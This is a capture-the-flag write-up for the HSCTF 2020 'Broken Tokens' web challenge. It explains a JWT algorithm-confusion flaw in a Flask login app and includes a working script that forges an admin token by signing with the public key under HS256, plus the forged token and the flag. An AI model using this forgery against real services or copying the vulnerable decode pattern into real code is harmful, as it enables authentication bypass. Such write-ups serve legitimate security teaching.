## Broken Tokens

* **CTF:** hsctf 2020
* **Category:** web
* **Points:** 100
* **Author(s):** b0uldrr
* **Date:** 05/06/20

---

### Challenge
```
I made a login page, is it really secure?

https://broken-tokens.web.hsctf.com/

Note: If you receive an "Internal Server Error" (HTTP Status Code 500), that means that your cookie is incorrect.

Author: hmmm
```

### Downloads
* [main.py](main.py)
* [publickey.pem](publickey.pem)

### Solution
Visiting the challenge site, we're presented with a login form and a public key.

![home](images/home.png)

```
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAtnREuAwK7M/jWZdSVNfN
4m+kX0rqakI6KIR/qzT/Fv7hfC5vg9UJgEaAGOfexmoDMBYTLRSHnQ9EYjF6bkCh
w+NVQCqsvy9psZVnjUHQ6QfVUdyrUcsOuRoMMaEBYp+qCegDY5Vp65Wzk05qXfvK
LJK9apOo0pPgD7fdOhpqwzejxgWxUgYvMqkGQS2aCC51ePvC6edkStNxovoDFvXk
uG69/7jEqs2k2pk5mI66MR+2U46ub8hPUk7WA6zTGHhIMuxny+7ivxYIXCqEbZGV
YhOuubXfAPrVN2UpL4YBvtfmHZMmjp2j39PEqxXU70kTk96xq3WhnYm46HhciyIz
zQIDAQAB
-----END PUBLIC KEY-----
```

Reading through the provided source ([main.py](main.py)) we can see the script has the following logic:
1. If the user logs in with the correct credentials (we can see the username is "admin" but the password has been redacted from the source) they are issued a JWT cookie with payload "auth"="admin", signed using RSA256 and an unknown private key.
1. Any other login attempt will issue a JWT cookie with payload "auth"="guest".
1. The script will check the user's JWT cookie, decode it using the provided public key, and check the value of the "auth" field.
1. If the auth value is "admin", the flag is displayed.
1. Otherwise the user is logged in as a guest.

![guest](images/guest.png)

Here is the source:

```python
import jwt
import base64
import os
import hashlib
from flask import Flask, render_template, make_response, request, redirect
app = Flask(__name__)
FLAG = os.getenv("FLAG")
PASSWORD = os.getenv("PASSWORD")
with open("privatekey.pem", "r") as f:
	PRIVATE_KEY = f.read()
with open("publickey.pem", "r") as f:
	PUBLIC_KEY = f.read()

@app.route('/', methods=['GET', 'POST'])
def index():
	if request.method == "POST":
		resp = make_response(redirect("/"))
		if request.form["action"] == "Login":
			if request.form["username"] == "admin" and request.form["password"] == PASSWORD:
				auth = jwt.encode({"auth": "admin"}, PRIVATE_KEY, algorithm="RS256")
			else:
				auth = jwt.encode({"auth": "guest"}, PRIVATE_KEY, algorithm="RS256")
			resp.set_cookie("auth", auth)
		else:
			resp.delete_cookie("auth")
		
		return resp
	else:
		auth = request.cookies.get("auth")
		if auth is None:
			logged_in = False
			admin = False
		else:
			logged_in = True
			admin = jwt.decode(auth, PUBLIC_KEY)["auth"] == "admin"
		resp = make_response(
			render_template("index.html", logged_in=logged_in, admin=admin, flag=FLAG)
		)
	return resp

@app.route("/publickey.pem")
def public_key():
	with open("./publickey.pem", "r") as f:
		resp = make_response(f.read())
		resp.mimetype = 'text/plain'
		return resp

if __name__ == "__main__":
	app.run()
```

The vulnerbility of the script is as follows:

JWT tokens can be signed in a number of different ways to ensure the validity of their contents. Two common ways are:
* RS256 - (RSA Signature with SHA-256) is an asymmetric algorithm, and it uses a public/private key pair: the identity provider has a private (secret) key used to generate the signature, and the consumer of the JWT gets a public key to validate the signature. Since the public key, as opposed to the private key, doesn’t need to be kept secured, most identity providers make it easily available for consumers to obtain and use (usually through a metadata URL).
* HS256 - (HMAC with SHA-256), on the other hand, is a symmetric algorithm, with only one (secret) key that is shared between the two parties. Since the same key is used both to generate the signature and to validate it, care must be taken to ensure that the key is not compromised.
If you will be developing the application consuming the JWTs, you can safely use HS256, because you will have control on who uses the secret keys. If, on the other hand, you don’t have control over the client, or you have no way of securing a secret key, RS256 will be a better fit, since the consumer only needs to know the public (shared) key.

The JWT issued on the challenge site uses a RS256 signature, so it was signed with a private key (which we don't have) and the challenge site will decrypt it with the public key to ensure its validity. We want to change the value of the `auth` payload so that we can login but we can't create another RS256 signature without the private key.

However, we *can* create a new JWT, changing the `auth` payload to `admin`, and also set the encryption algorithm to `HS256`, and sign it with the provided public key. When it is received by the challenge server, the app will check the signature with the same public key that we used to sign it, which is valid with HS256, making our token valid. 

This website has a good explanation of the vulnerability: https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6

We can create JWT tokens using the `pyjwt` library in python. **However**, we must use an older version of the library (0.4.3) because newer versions do not permit signing HS256 tokens witih asymmetic keys. You will get a "The specified key is an asymmetric key or x509 certificate and should not be used as an HMAC secret" error.

1. Uninstall any existing versions of pyjwt - `pip uninstall pyjwt`
1. Install the older version which supports our attack - `pip install pyjwt==0.4.3`

Here's my completed python script to generate a new JWT:

```python

#! /usr/bin/python3

# must use old version of pyjwt (pip install pyjwt==0.4.3), otherwise newer
# versions of the library will throw an error:
# "The specified key is an asymmetric key or x509 certificate and should not be used as an HMAC secret."

import jwt  

# Public key was downloadable from challenge website
f = open("publickey.pem", "r")
PUBLIC_KEY = f.read()

auth = jwt.encode({"auth":"admin"}, PUBLIC_KEY, algorithm="HS256")

print(auth.decode())
```

And running it...

```
$ ./soln.py
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhdXRoIjoiYWRtaW4ifQ.MfoiS9XkQHMOw2Y6uQJrw0gM2NUfGYM-1Sz-SzKvad4
```

I copied that JWT value and used it to edit the existing cookie in my browser. Refreshing the page logged me in as admin and displayed the flag:

![flag](images/flag.png)

---

### Flag 
```
flag{1n53cur3_tok3n5_5474212}
```
